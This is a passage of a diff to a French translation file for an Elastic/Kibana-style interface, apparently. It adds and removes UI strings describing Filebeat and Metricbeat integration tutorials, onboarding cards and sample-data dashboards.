l'utilisateur \"elastic\" intégré pour sécuriser les clients dans un environnement de production. À la place, configurez des utilisateurs autorisés ou des clés d'API, et n'exposez pas les mots de passe dans les fichiers de configuration. [Learn more]({linkUrl}).", + "home.tutorials.common.winlogbeatInstructions.config.windowsTextPre": "Modifiez {path} afin de définir les informations de connexion :", + "home.tutorials.common.winlogbeatInstructions.install.windowsTextPost": "Modifiez les paramètres sous \"output.elasticsearch\" dans le fichier {path} afin de pointer vers votre installation Elasticsearch.", + "home.tutorials.common.winlogbeatInstructions.install.windowsTextPre": "Vous utilisez Winlogbeat pour la première fois ? Consultez le [guide de démarrage rapide]({winlogbeatLink}).\n 1. Téléchargez le fichier .zip Winlogbeat pour Windows via la page [Télécharger]({elasticLink}).\n 2. Extrayez le contenu du fichier compressé sous {folderPath}.\n 3. Renommez le répertoire \"{directoryName}\" en \"Winlogbeat\".\n 4. Ouvrez une invite PowerShell en tant qu'administrateur (faites un clic droit sur l'icône PowerShell et sélectionnez **Exécuter en tant qu'administrateur**). Si vous exécutez Windows XP, vous devrez peut-être télécharger et installer PowerShell.\n 5. Dans l'invite PowerShell, exécutez les commandes suivantes afin d'installer Winlogbeat en tant que service Windows.", + "home.tutorials.consulMetrics.longDescription": "Le module Metricbeat \"consul\" récupère des indicateurs depuis Consul. [En savoir plus]({learnMoreLink}).", + "home.tutorials.corednsLogs.longDescription": "Il s'agit d'un module Filebeat pour CoreDNS. Celui-ci prend en charge les déploiements CoreDNS autonomes et les déploiements CoreDNS dans Kubernetes. [En savoir plus]({learnMoreLink}).", + "home.tutorials.corednsMetrics.longDescription": "Le module Metricbeat \"coredns\" récupère des indicateurs depuis CoreDNS. [En savoir plus]({learnMoreLink}).", + "home.tutorials.couchbaseMetrics.longDescription": "Le module Metricbeat \"couchbase\" récupère des indicateurs depuis Couchbase. [En savoir plus]({learnMoreLink}).", + "home.tutorials.couchdbMetrics.longDescription": "Le module Metricbeat \"couchdb\" récupère des indicateurs depuis CouchDB. [En savoir plus]({learnMoreLink}).", + "home.tutorials.crowdstrikeLogs.longDescription": "Il s'agit du module Filebeat pour CrowdStrike Falcon utilisant le [connecteur SIEM](https://www.crowdstrike.com/blog/tech-center/integrate-with-your-siem) Falcon. Ce module collecte ces données, les convertit en ECS et les ingère pour les afficher dans le SIEM. Par défaut, le connecteur SIEM Falcon génère les données d'événement de l'API de streaming Falcon au format JSON. [En savoir plus]({learnMoreLink}).", + "home.tutorials.cylanceLogs.longDescription": "Ce module permet de recevoir des logs CylancePROTECT par le biais de Syslog ou d'un fichier. [En savoir plus]({learnMoreLink}).", + "home.tutorials.dockerMetrics.longDescription": "Le module Metricbeat \"docker\" récupère des indicateurs depuis le serveur Docker. [En savoir plus]({learnMoreLink}).", + "home.tutorials.dropwizardMetrics.longDescription": "Le module Metricbeat \"dropwizard\" récupère des indicateurs depuis l'application Java Dropwizard. [En savoir plus]({learnMoreLink}).", + "home.tutorials.elasticsearchLogs.longDescription": "Le module Filebeat \"elasticsearch\" analyse les logs créés par Elasticsearch. [En savoir plus]({learnMoreLink}).", + "home.tutorials.elasticsearchMetrics.longDescription": "Le module Metricbeat \"elasticsearch\" récupère des indicateurs depuis Elasticsearch. [En savoir plus]({learnMoreLink}).", + "home.tutorials.envoyproxyLogs.longDescription": "Il s'agit d'un module Filebeat pour le log d'accès à Envoy Proxy (https://www.envoyproxy.io/docs/envoy/v1.10.0/configuration/access_log). Celui-ci prend en charge les déploiements autonomes et les déploiements Envoy Proxy dans Kubernetes. [Learn more]({learnMoreLink}).", + "home.tutorials.envoyproxyMetrics.longDescription": "Le module Metricbeat \"envoyproxy\" récupère des indicateurs depuis Envoy Proxy. [En savoir plus]({learnMoreLink}).", + "home.tutorials.etcdMetrics.longDescription": "Le module Metricbeat \"etcd\" récupère des indicateurs depuis Etcd. [En savoir plus]({learnMoreLink}).", + "home.tutorials.f5Logs.longDescription": "Ce module permet de recevoir des logs Big-IP Access Policy Manager par le biais de Syslog ou d'un fichier. [En savoir plus]({learnMoreLink}).", + "home.tutorials.fortinetLogs.longDescription": "Il s'agit d'un module pour les logs Fortinet FortiOS envoyés au format Syslog. [En savoir plus]({learnMoreLink}).", + "home.tutorials.gcpLogs.longDescription": "Il s'agit d'un module pour les logs Google Cloud. Il prend en charge la lecture des logs d'audit, de flux VPC et de pare-feu qui ont été exportés depuis Stackdriver dans un récepteur de rubriques Google Pub/Sub. [En savoir plus]({learnMoreLink}).", + "home.tutorials.gcpMetrics.longDescription": "Le module Metricbeat \"gcp\" récupère des indicateurs depuis Google Cloud Platform à l'aide de l'API de monitoring Stackdriver. [En savoir plus]({learnMoreLink}).", + "home.tutorials.golangMetrics.longDescription": "Le module Metricbeat \"{moduleName}\" récupère des indicateurs depuis une application Golang. [En savoir plus]({learnMoreLink}).", + "home.tutorials.gsuiteLogs.longDescription": "Il s'agit d'un module pour l'ingestion de données depuis les différentes API de rapports d'audit GSuite. [En savoir plus]({learnMoreLink}).", + "home.tutorials.haproxyLogs.longDescription": "Le module collecte et analyse les logs d'un processus (\"haproxy\") [En savoir plus]({learnMoreLink}).", + "home.tutorials.haproxyMetrics.longDescription": "Le module Metricbeat \"haproxy\" récupère des indicateurs depuis HAProxy. [En savoir plus]({learnMoreLink}).", + "home.tutorials.ibmmqLogs.longDescription": "Collectez des logs IBM MQ avec Filebeat. [En savoir plus]({learnMoreLink}).", + "home.tutorials.ibmmqMetrics.longDescription": "Le module Metricbeat \"ibmmq\" récupère des indicateurs depuis les instances IBM MQ. [En savoir plus]({learnMoreLink}).", + "home.tutorials.icingaLogs.longDescription": "Le module analyse le log principal et les logs de débogage et de démarrage d'[Icinga](https://www.icinga.com/products/icinga-2/). [En savoir plus]({learnMoreLink}).", + "home.tutorials.iisLogs.longDescription": "Le module Filebeat \"iis\" analyse les logs d'accès et d'erreurs créés par le serveur HTTP IIS. [En savoir plus]({learnMoreLink}).", + "home.tutorials.iisMetrics.longDescription": "Le module Metricbeat \"iis\" collecte les indicateurs du serveur IIS ainsi que des sites web et des pools d'applications en cours d'exécution. [En savoir plus]({learnMoreLink}).", + "home.tutorials.impervaLogs.longDescription": "Ce module permet de recevoir des logs Imperva SecureSphere par le biais de Syslog ou d'un fichier. [En savoir plus]({learnMoreLink}).", + "home.tutorials.infobloxLogs.longDescription": "Ce module permet de recevoir des logs Infoblox NIOS par le biais de Syslog ou d'un fichier. [En savoir plus]({learnMoreLink}).", + "home.tutorials.iptablesLogs.longDescription": "Il s'agit d'un module pour les logs iptables et ip6tables. Il analyse les logs reçus via le réseau par le biais de Syslog ou d’un fichier. En outre, il comprend le préfixe ajouté par certains pare-feux Ubiquiti qui contient le nom de l'ensemble de règles, le numéro de règle et l'action effectuée sur le trafic (autoriser/refuser). [En savoir plus]({learnMoreLink}).", + "home.tutorials.juniperLogs.longDescription": "Ce module permet de recevoir des logs Juniper JUNOS par le biais de Syslog ou d'un fichier. [En savoir plus]({learnMoreLink}).", + "home.tutorials.kafkaLogs.longDescription": "Le module Filebeat \"kafka\" analyse les logs créés par Kafka. [En savoir plus]({learnMoreLink}).", + "home.tutorials.kafkaMetrics.longDescription": "Le module Metricbeat \"kafka\" récupère des indicateurs depuis Kafka. [En savoir plus]({learnMoreLink}).", + "home.tutorials.kibanaLogs.longDescription": "Il s'agit du module Kibana. [En savoir plus]({learnMoreLink}).", + "home.tutorials.kibanaMetrics.longDescription": "Le module Metricbeat \"kibana\" récupère des indicateurs depuis Kibana. [En savoir plus]({learnMoreLink}).", + "home.tutorials.kubernetesMetrics.longDescription": "Le module Metricbeat \"kubernetes\" récupère des indicateurs depuis les API Kubernetes. [En savoir plus]({learnMoreLink}).", + "home.tutorials.logstashLogs.longDescription": "Le module analyse les logs standard et le log de requêtes lentes Logstash. Il prend en charge les formats texte brut et JSON. [En savoir plus]({learnMoreLink}).", + "home.tutorials.logstashMetrics.longDescription": "Le module Metricbeat \"{moduleName}\" récupère des indicateurs depuis un serveur Logstash. [En savoir plus]({learnMoreLink}).", + "home.tutorials.memcachedMetrics.longDescription": "Le module Metricbeat \"memcached\" récupère des indicateurs depuis Memcached. [En savoir plus]({learnMoreLink}).", + "home.tutorials.microsoftLogs.longDescription": "Collectez des alertes Microsoft Defender ATP pour les utiliser avec Elastic Security [En savoir plus]({learnMoreLink}).", + "home.tutorials.mispLogs.longDescription": "Il s'agit d'un module Filebeat pour la lecture des informations de Threat Intelligence depuis la plateforme MISP (https://www.circl.lu/doc/misp/). Il utilise l'entrée httpjson pour accéder à l'interface d'API REST MISP. [En savoir plus]({learnMoreLink}).", + "home.tutorials.mongodbLogs.longDescription": "Le module collecte et analyse les logs créés par [MongoDB](https://www.mongodb.com/). [En savoir plus]({learnMoreLink}).", + "home.tutorials.mongodbMetrics.longDescription": "Le module Metricbeat \"mongodb\" récupère des indicateurs depuis le serveur MongoDB. [En savoir plus]({learnMoreLink}).", + "home.tutorials.mssqlLogs.longDescription": "Le module analyse les logs d'erreurs créés par MSSQL. [En savoir plus]({learnMoreLink}).", + "home.tutorials.mssqlMetrics.longDescription": "Le module Metricbeat \"mssql\" récupère des indicateurs de monitoring, de logs et de performances depuis une instance Microsoft SQL Server. [En savoir plus]({learnMoreLink}).", + "home.tutorials.muninMetrics.longDescription": "Le module Metricbeat \"munin\" récupère des indicateurs depuis Munin. [En savoir plus]({learnMoreLink}).", + "home.tutorials.mysqlLogs.longDescription": "Le module Filebeat \"mysql\" analyse les logs d'erreurs et de requêtes lentes créés par MySQL. [En savoir plus]({learnMoreLink}).", + "home.tutorials.mysqlMetrics.longDescription": "Le module Metricbeat \"mysql\" récupère des indicateurs depuis le serveur MySQL. [En savoir plus]({learnMoreLink}).", + "home.tutorials.natsLogs.longDescription": "Le module Filebeat \"nats\" analyse les logs créés par NATS. [En savoir plus]({learnMoreLink}).", + "home.tutorials.natsMetrics.longDescription": "Le module Metricbeat \"nats\" récupère des indicateurs depuis NATS. [En savoir plus]({learnMoreLink}).", + "home.tutorials.netflowLogs.longDescription": "Ce module permet de recevoir des enregistrements de flux NetFlow et IPFIX via UDP. Cette entrée prend en charge les versions 1, 5, 6, 7, 8 et 9 de NetFlow ainsi qu'IPFIX. Pour les versions de NetFlow antérieures à la version 9, les champs sont automatiquement mappés vers NetFlow v9. [En savoir plus]({learnMoreLink})", + "home.tutorials.netscoutLogs.longDescription": "Ce module permet de recevoir des logs Arbor Peakflow SP par le biais de Syslog ou d'un fichier. [En savoir plus]({learnMoreLink}).", + "home.tutorials.nginxLogs.longDescription": "Le module Filebeat \"nginx\" analyse les logs d'accès et d'erreurs créés par le serveur HTTP Nginx. [En savoir plus]({learnMoreLink}).", + "home.tutorials.nginxMetrics.longDescription": "Le module Metricbeat \"nginx\" récupère des indicateurs depuis le serveur HTTP Nginx. Le module récupère les données de statut du serveur depuis la page web générée par {statusModuleLink}, qui doit être activé dans votre installation Nginx. [En savoir plus]({learnMoreLink}).", + "home.tutorials.o365Logs.longDescription": "Il s'agit d'un module pour les logs Office 365 reçus via l'un des points de terminaison d'API Office 365. Actuellement, il prend en charge les actions et les événements utilisateur, administrateur, système et de politique depuis les logs d’activité Office 365 et Azure AD exposés par l'API d’activité de gestion Office 365. [En savoir plus]({learnMoreLink}).", + "home.tutorials.oktaLogs.longDescription": "Le module Okta collecte les événements de l'[API Okta](https://developer.okta.com/docs/reference/). Plus précisément, il prend en charge la lecture depuis l'[API de log système Okta](https://developer.okta.com/docs/reference/api/system-log/). [En savoir plus]({learnMoreLink}).", + "home.tutorials.openmetricsMetrics.longDescription": "Le module Metricbeat \"openmetrics\" récupère des indicateurs depuis un point de terminaison fournissant des indicateurs au format OpenMetrics. [En savoir plus]({learnMoreLink}).", + "home.tutorials.oracleMetrics.longDescription": "Le module Metricbeat \"{moduleName}\" récupère des indicateurs depuis un serveur Oracle. [En savoir plus]({learnMoreLink}).", + "home.tutorials.osqueryLogs.longDescription": "Le module collecte et décode les logs de résultats écrits par [osqueryd](https://osquery.readthedocs.io/en/latest/introduction/using-osqueryd/) au format JSON. Pour configurer \"osqueryd\", suivez les instructions d'installation d'osquery pour votre système d'exploitation et configurez le pilote de logging \"filesystem\" (celui par défaut). Assurez-vous que les horodatages UTC sont activés. [En savoir plus]({learnMoreLink}).", + "home.tutorials.panwLogs.longDescription": "Il s'agit d'un module pour les logs de monitoring des pare-feux Palo Alto Networks PAN-OS reçus par le biais de Syslog ou lus depuis un fichier. Actuellement, il prend en charge les messages de type Trafic et Menaces. [En savoir plus]({learnMoreLink}).", + "home.tutorials.phpFpmMetrics.longDescription": "Le module Metricbeat \"php_fpm\" récupère des indicateurs depuis le serveur PHP-FPM. [En savoir plus]({learnMoreLink}).", + "home.tutorials.postgresqlLogs.longDescription": "Le module Filebeat \"postgresql\" analyse les logs d'erreurs et de requêtes lentes créés par PostgreSQL. [En savoir plus]({learnMoreLink}).", + "home.tutorials.postgresqlMetrics.longDescription": "Le module Metricbeat \"postgresql\" récupère des indicateurs depuis le serveur PostgreSQL. [En savoir plus]({learnMoreLink}).", + "home.tutorials.prometheusMetrics.longDescription": "Le module Metricbeat \"{moduleName}\" récupère des indicateurs depuis le point de terminaison Prometheus. [En savoir plus]({learnMoreLink}).", + "home.tutorials.rabbitmqLogs.longDescription": "Ce module permet d'analyser les [fichiers log RabbitMQ](https://www.rabbitmq.com/logging.html). [En savoir plus]({learnMoreLink}).", + "home.tutorials.rabbitmqMetrics.longDescription": "Le module Metricbeat \"rabbitmq\" récupère des indicateurs depuis le serveur RabbitMQ. [En savoir plus]({learnMoreLink}).", + "home.tutorials.radwareLogs.longDescription": "Ce module permet de recevoir des logs Radware DefensePro par le biais de Syslog ou d'un fichier. [En savoir plus]({learnMoreLink}).", + "home.tutorials.redisenterpriseMetrics.longDescription": "Le module Metricbeat \"redisenterprise\" récupère des indicateurs depuis le serveur Redis Enterprise. [En savoir plus]({learnMoreLink}).", + "home.tutorials.redisLogs.longDescription": "Le module Filebeat \"redis\" analyse les logs d'erreurs et de requêtes lentes créés par Redis. Pour que Redis écrive des logs d'erreurs, assurez-vous que l'option \"logfile\" est définie sur \"redis-server.log\" dans le fichier de configuration Redis. Les logs de requêtes lentes sont lus directement depuis Redis via la commande \"SLOWLOG\". Pour que Redis enregistre des logs de requêtes lentes, assurez-vous que l'option \"slowlog-log-slower-than\" est activée. Notez que l'ensemble de fichiers \"slowlog\" est expérimental. [En savoir plus]({learnMoreLink}).", + "home.tutorials.redisMetrics.longDescription": "Le module Metricbeat \"redis\" récupère des indicateurs depuis le serveur Redis. [En savoir plus]({learnMoreLink}).", + "home.tutorials.santaLogs.longDescription": "Le module collecte et analyse les logs de [Google Santa](https://github.com/google/santa), un outil de sécurité pour macOS qui monitore les exécutions de processus et est capable de mettre en liste noire/blanche des fichiers binaires. [En savoir plus]({learnMoreLink}).", + "home.tutorials.sonicwallLogs.longDescription": "Ce module permet de recevoir des logs Sonicwall FW par le biais de Syslog ou d'un fichier. [En savoir plus]({learnMoreLink}).", + "home.tutorials.sophosLogs.longDescription": "Il s'agit d'un module pour les produits Sophos. Actuellement, il prend en charge les logs XG SFOS envoyés au format Syslog. [En savoir plus]({learnMoreLink}).", + "home.tutorials.squidLogs.longDescription": "Ce module permet de recevoir des logs Squid par le biais de Syslog ou d'un fichier. [En savoir plus]({learnMoreLink}).", + "home.tutorials.stanMetrics.longDescription": "Le module Metricbeat \"stan\" récupère des indicateurs depuis STAN. [En savoir plus]({learnMoreLink}).", + "home.tutorials.statsdMetrics.longDescription": "Le module Metricbeat \"statsd\" récupère des indicateurs depuis statsd. [En savoir plus]({learnMoreLink}).", + "home.tutorials.suricataLogs.longDescription": "Il s'agit d'un module pour le log IDS/IPS/NSM Suricata. Il analyse les logs qui sont au [format JSON Suricata Eve](https://suricata.readthedocs.io/en/latest/output/eve/eve-json-format.html). [En savoir plus]({learnMoreLink}).", + "home.tutorials.systemLogs.longDescription": "Le module collecte et analyse les logs créés par le service de logging système des distributions basées sur Unix/Linux communes. [En savoir plus]({learnMoreLink}).", + "home.tutorials.systemMetrics.longDescription": "Le module Metricbeat \"system\" collecte des statistiques relatives au CPU, à la mémoire, au réseau et au disque depuis l'hôte. Il collecte des statistiques au niveau du système et des statistiques par processus et système de fichiers. [En savoir plus]({learnMoreLink}).", + "home.tutorials.tomcatLogs.longDescription": "Ce module permet de recevoir des logs Apache Tomcat par le biais de Syslog ou d'un fichier. [En savoir plus]({learnMoreLink}).", + "home.tutorials.traefikLogs.longDescription": "Le module analyse les logs d'accès créés par [Traefik](https://traefik.io/). [En savoir plus]({learnMoreLink}).", + "home.tutorials.traefikMetrics.longDescription": "Le module Metricbeat \"traefik\" récupère des indicateurs depuis Traefik. [En savoir plus]({learnMoreLink}).", + "home.tutorials.uptimeMonitors.longDescription": "Monitorez la disponibilité des services grâce à une détection active. À partir d'une liste d'URL, Heartbeat pose cette question toute simple : Êtes-vous actif ? [En savoir plus]({learnMoreLink}).", + "home.tutorials.uwsgiMetrics.longDescription": "Le module Metricbeat \"uwsgi\" récupère des indicateurs depuis le serveur uWSGI. [En savoir plus]({learnMoreLink}).", + "home.tutorials.vsphereMetrics.longDescription": "Le module Metricbeat \"vsphere\" récupère des indicateurs depuis un cluster vSphere. [En savoir plus]({learnMoreLink}).", + "home.tutorials.windowsEventLogs.longDescription": "Utilisez Winlogbeat pour collecter des logs depuis le log des événements Windows. [En savoir plus]({learnMoreLink}).", + "home.tutorials.windowsMetrics.longDescription": "Le module Metricbeat \"windows\" récupère des indicateurs depuis Windows. [En savoir plus]({learnMoreLink}).", + "home.tutorials.zeekLogs.longDescription": "Il s'agit d'un module pour Zeek, anciennement appelé Bro. Il analyse les logs qui sont au [format JSON Zeek](https://www.zeek.org/manual/release/logs/index.html). [En savoir plus]({learnMoreLink}).", + "home.tutorials.zookeeperMetrics.longDescription": "Le module Metricbeat \"{moduleName}\" récupère des indicateurs depuis un serveur Zookeeper. [En savoir plus]({learnMoreLink}).", + "home.tutorials.zscalerLogs.longDescription": "Ce module permet de recevoir des logs Zscaler NSS par le biais de Syslog ou d'un fichier. [En savoir plus]({learnMoreLink}).", "home.addData.addDataButtonLabel": "Ajouter des intégrations", "home.addData.sampleDataButtonLabel": "Utiliser un exemple de données", "home.addData.sectionTitle": "Ajoutez des intégrations pour commencer", "home.addData.text": "Vous avez plusieurs options pour commencer à exploiter vos données. Vous pouvez collecter des données à partir d'une application ou d'un service, ou bien charger un fichier. Et si vous n'êtes pas encore prêt à utiliser vos propres données, utilisez notre exemple d’ensemble de données.", "home.addData.uploadFileButtonLabel": "Charger un fichier", + "home.breadcrumbs.gettingStartedTitle": "Commencer", "home.breadcrumbs.homeTitle": "Accueil", "home.breadcrumbs.integrationsAppTitle": "Intégrations", "home.exploreButtonLabel": "Explorer par moi-même", "home.exploreYourDataDescription": "Une fois toutes les étapes terminées, vous êtes prêt à explorer vos données.", + "home.guidedOnboarding.gettingStarted.observability.cardDescription": "Obtenez une observabilité de bout en bout de vos environnements en consolidant vos journaux, vos indicateurs et vos traces.", + "home.guidedOnboarding.gettingStarted.observability.cardTitle": "Monitorer mes environnements", + "home.guidedOnboarding.gettingStarted.observability.iconName": "Logo Observability", + "home.guidedOnboarding.gettingStarted.search.cardDescription": "Créez une expérience de recherche fine pour vos sites web, vos applications, votre contenu workplace, etc.", + "home.guidedOnboarding.gettingStarted.search.cardTitle": "Rechercher dans mes données", + "home.guidedOnboarding.gettingStarted.search.iconName": "Logo Entreprise Search", + "home.guidedOnboarding.gettingStarted.security.cardDescription": "Protégez votre environnement contre les menaces en unifiant SIEM, la sécurité des points de terminaison et la sécurité cloud en un seul endroit.", + "home.guidedOnboarding.gettingStarted.security.cardTitle": "Protéger mon environnement", + "home.guidedOnboarding.gettingStarted.security.iconName": "Logo Security", + "home.guidedOnboarding.gettingStarted.skip.buttonLabel": "Non merci, je vais explorer par moi-même.", + "home.guidedOnboarding.gettingStarted.useCaseSelectionSubtitle": "Sélectionnez un point de départ pour une visite rapide de la façon dont Elastic peut vous aider à faire encore plus avec vos données.", + "home.guidedOnboarding.gettingStarted.useCaseSelectionTitle": "Par quoi voulez-vous commencer ?", "home.header.title": "Bienvenue chez vous", "home.letsStartDescription": "Ajoutez des données à votre cluster depuis n’importe quelle source, puis analysez-les et visualisez-les en temps réel. Utilisez nos solutions pour définir des recherches, observer votre écosystème et vous protéger contre les menaces de sécurité.", "home.letsStartTitle": "Ajoutez des intégrations pour commencer", - "home.loadTutorials.requestFailedErrorMessage": "Échec de la requête avec le code de statut : {status}", "home.loadTutorials.unableToLoadErrorMessage": "Impossible de charger les tutoriels", "home.manageData.devToolsButtonLabel": "Outils de développement", "home.manageData.sectionTitle": "Gestion", @@ -3837,7 +3176,7 @@ "home.sampleData.flightsSpec.departuresCountMapTitle": "[Vols] Mappage du nombre de départs", "home.sampleData.flightsSpec.destinationWeatherTitle": "[Vols] Météo à la destination", "home.sampleData.flightsSpec.flightLogTitle": "[Vols] Journal de vol", - "home.sampleData.flightsSpec.globalFlightDashboardDescription": "Analyser des données aéroportuaires factices pour ES-Air, Logstash Airways, Kibana Airlines et JetBeats", + "home.sampleData.flightsSpec.globalFlightDashboardDescription": "Analyser des données aéroportuaires factices pour ES-Air, Logstash Airways, Kibana Airlines et JetBeats", "home.sampleData.flightsSpec.globalFlightDashboardTitle": "[Vols] Tableau de bord des vols internationaux", "home.sampleData.flightsSpecDescription": "Exemple de données, de visualisations et de tableaux de bord pour le monitoring des itinéraires de vol.", "home.sampleData.flightsSpecTitle": "Exemple de données aéroportuaires", @@ -3846,7 +3185,7 @@ "home.sampleData.logsSpec.goalsTitle": "[Logs] Objectifs", "home.sampleData.logsSpec.heatmapTitle": "[Logs] Carte thermique de destination unique", "home.sampleData.logsSpec.hostVisitsBytesTableTitle": "[Logs] Tableau des hôtes, visites et octets", - "home.sampleData.logsSpec.responseCodesOverTimeTitle": "[Logs] Codes de réponse sur la durée + annotations", + "home.sampleData.logsSpec.responseCodesOverTimeTitle": "[Logs] Codes de réponse sur la durée + annotations", "home.sampleData.logsSpec.sourceAndDestinationSankeyChartTitle": "[Logs] Diagramme de Sankey de système d'exploitation source et destination", "home.sampleData.logsSpec.visitorsMapTitle": "[Logs] Mappage des visiteurs", "home.sampleData.logsSpec.webTrafficDescription": "Analyser des données de log factices relatives au trafic Internet du site d'Elastic", @@ -3855,14 +3194,13 @@ "home.sampleData.logsSpecTitle": "Exemple de logs Internet", "home.solutionsSection.sectionTitle": "Choisir votre solution", "home.tryButtonLabel": "Ajouter des intégrations", - "home.tutorial.addDataToKibanaDescription": "En plus d'ajouter {integrationsLink}, vous pouvez essayer l'exemple de données ou charger vos propres données.", "home.tutorial.addDataToKibanaDescription.integrations": "intégrations", "home.tutorial.addDataToKibanaTitle": "Autres façons d'ajouter des données", "home.tutorial.backToDirectory": "Retour au répertoire", "home.tutorial.card.sampleDataDescription": "Commencez votre exploration de Kibana avec ces ensembles de données \"en un clic\".", "home.tutorial.card.sampleDataTitle": "Exemple de données", - "home.tutorial.elasticCloudButtonLabel": "Elastic Cloud", - "home.tutorial.instruction_variant.fleet": "Elastic APM dans Fleet", + "home.tutorial.elasticCloudButtonLabel": "Elastic Cloud", + "home.tutorial.instruction_variant.fleet": "Elastic APM dans Fleet", "home.tutorial.instructionSet.checkStatusButtonLabel": "Vérifier le statut", "home.tutorial.instructionSet.customizeLabel": "Personnaliser les extraits de code", "home.tutorial.instructionSet.noDataLabel": "Aucune donnée trouvée", @@ -3873,130 +3211,85 @@ "home.tutorial.introduction.browseAllIntegrationsButton": "Parcourir toutes les intégrations", "home.tutorial.introduction.imageAltDescription": "Capture d'écran du tableau de bord principal.", "home.tutorial.introduction.viewButtonLabel": "Consulter les champs exportés", - "home.tutorial.noTutorialLabel": "Tutoriel {tutorialId} introuvable", - "home.tutorial.savedObject.addedLabel": "{savedObjectsLength} objets enregistrés ont bien été ajoutés.", "home.tutorial.savedObject.confirmButtonLabel": "Confirmer l'écrasement", "home.tutorial.savedObject.defaultButtonLabel": "Charger des objets Kibana", "home.tutorial.savedObject.installLabel": "Importe un modèle d'indexation, des visualisations et des tableaux de bord prédéfinis.", - "home.tutorial.savedObject.installStatusLabel": "{overwriteErrorsLength} objets sur {savedObjectsLength} existent déjà. Cliquez sur \"Confirmer l'écrasement\" pour importer et écraser les objets existants. Toute modification apportée aux objets sera perdue.", "home.tutorial.savedObject.loadTitle": "Charger des objets Kibana", - "home.tutorial.savedObject.requestFailedErrorMessage": "Échec de la requête. Erreur : {message}.", - "home.tutorial.savedObject.unableToAddErrorMessage": "Impossible d'ajouter {errorsLength} objets Kibana sur {savedObjectsLength} . Erreur : {errorMessage}.", "home.tutorial.selectionLegend": "Type de déploiement", "home.tutorial.selfManagedButtonLabel": "Autogéré", "home.tutorial.tabs.sampleDataTitle": "Exemple de données", - "home.tutorial.unexpectedStatusCheckStateErrorDescription": "État de vérification du statut {statusCheckState} inattendu", - "home.tutorial.unhandledInstructionTypeErrorDescription": "Type d'instructions {visibleInstructions} non pris en charge", "home.tutorialDirectory.featureCatalogueDescription": "Importez des données à partir d'applications et de services populaires.", "home.tutorialDirectory.featureCatalogueTitle": "Ajouter des données", "home.tutorials.activemqLogs.artifacts.dashboards.linkLabel": "Événements d'audit ActiveMQ", - "home.tutorials.activemqLogs.longDescription": "Collectez les logs ActiveMQ avec Filebeat. [En savoir plus]({learnMoreLink}).", "home.tutorials.activemqLogs.nameTitle": "Logs ActiveMQ", "home.tutorials.activemqLogs.shortDescription": "Collectez et analysez les logs à partir des instances ActiveMQ avec Filebeat.", "home.tutorials.activemqMetrics.artifacts.application.label": "Découverte", - "home.tutorials.activemqMetrics.longDescription": "Le module Metricbeat ''activemq'' récupère les indicateurs depuis les instances ActiveMQ. [En savoir plus]({learnMoreLink}).", "home.tutorials.activemqMetrics.nameTitle": "Indicateurs ActiveMQ", "home.tutorials.activemqMetrics.shortDescription": "Collectez les indicateurs à partir des instances ActiveMQ avec Metricbeat.", "home.tutorials.aerospikeMetrics.artifacts.application.label": "Découverte", - "home.tutorials.aerospikeMetrics.longDescription": "Le module Metricbeat ''aerospike'' récupère les indicateurs d'Aerospike. [En savoir plus]({learnMoreLink}).", "home.tutorials.aerospikeMetrics.nameTitle": "Indicateurs Aerospike", "home.tutorials.aerospikeMetrics.shortDescription": "Collectez les indicateurs à partir des serveurs Aerospike avec Metricbeat.", "home.tutorials.apacheLogs.artifacts.dashboards.linkLabel": "Tableau de bord des logs Apache", - "home.tutorials.apacheLogs.longDescription": "Le module Filebeat ''apache'' analyse les logs d'accès et d'erreurs créés par le serveur HTTP Apache. [En savoir plus]({learnMoreLink}).", "home.tutorials.apacheLogs.nameTitle": "Logs de serveur HTTP Apache", "home.tutorials.apacheLogs.shortDescription": "Collectez et analysez les logs à partir des serveurs HTTP Apache avec Filebeat.", - "home.tutorials.apacheMetrics.artifacts.dashboards.linkLabel": "Tableau de bord des indicateurs Apache", - "home.tutorials.apacheMetrics.longDescription": "Le module Metricbeat ''apache'' récupère les indicateurs depuis le serveur HTTP Apache 2. [En savoir plus]({learnMoreLink}).", + "home.tutorials.apacheMetrics.artifacts.dashboards.linkLabel": "Tableau de bord des indicateurs Apache", "home.tutorials.apacheMetrics.nameTitle": "Indicateurs de serveur HTTP Apache", "home.tutorials.apacheMetrics.shortDescription": "Collectez les indicateurs à partir des serveurs HTTP Apache avec Metricbeat.", "home.tutorials.auditbeat.artifacts.dashboards.linkLabel": "Application Security", - "home.tutorials.auditbeat.longDescription": "Utilisez Auditbeat pour collecter les données d'audit de vos hôtes. Ces données incluent les processus, utilisateurs, connexions, informations de socket, accès aux fichiers et bien plus encore. [En savoir plus]({learnMoreLink}).", "home.tutorials.auditbeat.nameTitle": "Événements Auditbeat", "home.tutorials.auditbeat.shortDescription": "Collectez les événements à partir de vos serveurs avec Auditbeat.", "home.tutorials.auditdLogs.artifacts.dashboards.linkLabel": "Événements d'audit", - "home.tutorials.auditdLogs.longDescription": "Le module collecte et analyse les logs du démon d'audit (''auditd'') [En savoir plus]({learnMoreLink}).", "home.tutorials.auditdLogs.nameTitle": "Logs auditd", "home.tutorials.auditdLogs.shortDescription": "Collectez et analysez les logs à partir du démon d'audit Linux avec Filebeat.", - "home.tutorials.awsLogs.artifacts.dashboards.linkLabel": "Tableau de bord du log d'accès au serveur AWS S3", - "home.tutorials.awsLogs.longDescription": "Collectez des logs AWS en les exportant vers un compartiment S3 configuré avec la notification SQS [En savoir plus]({learnMoreLink}).", - "home.tutorials.awsLogs.nameTitle": "Logs AWS S3", + "home.tutorials.awsLogs.artifacts.dashboards.linkLabel": "Tableau de bord du log d'accès au serveur AWS S3", + "home.tutorials.awsLogs.nameTitle": "Logs AWS S3", "home.tutorials.awsLogs.shortDescription": "Collectez et analysez les logs à partir des compartiments S3 AWS avec Filebeat.", - "home.tutorials.awsMetrics.artifacts.dashboards.linkLabel": "Tableau de bord des indicateurs AWS", - "home.tutorials.awsMetrics.longDescription": "Le module Metricbeat ''aws'' récupère les indicateurs depuis les API AWS et Cloudwatch. [En savoir plus]({learnMoreLink}).", - "home.tutorials.awsMetrics.nameTitle": "Indicateurs AWS", - "home.tutorials.awsMetrics.shortDescription": "Collectez les indicateurs pour les instances EC2 depuis les API AWS et Cloudwatch avec Metricbeat.", + "home.tutorials.awsMetrics.artifacts.dashboards.linkLabel": "Tableau de bord des indicateurs AWS", + "home.tutorials.awsMetrics.nameTitle": "Indicateurs AWS", + "home.tutorials.awsMetrics.shortDescription": "Collectez les indicateurs pour les instances EC2 depuis les API AWS et Cloudwatch avec Metricbeat.", "home.tutorials.azureLogs.artifacts.dashboards.linkLabel": "Tableau de bord des logs Azure", - 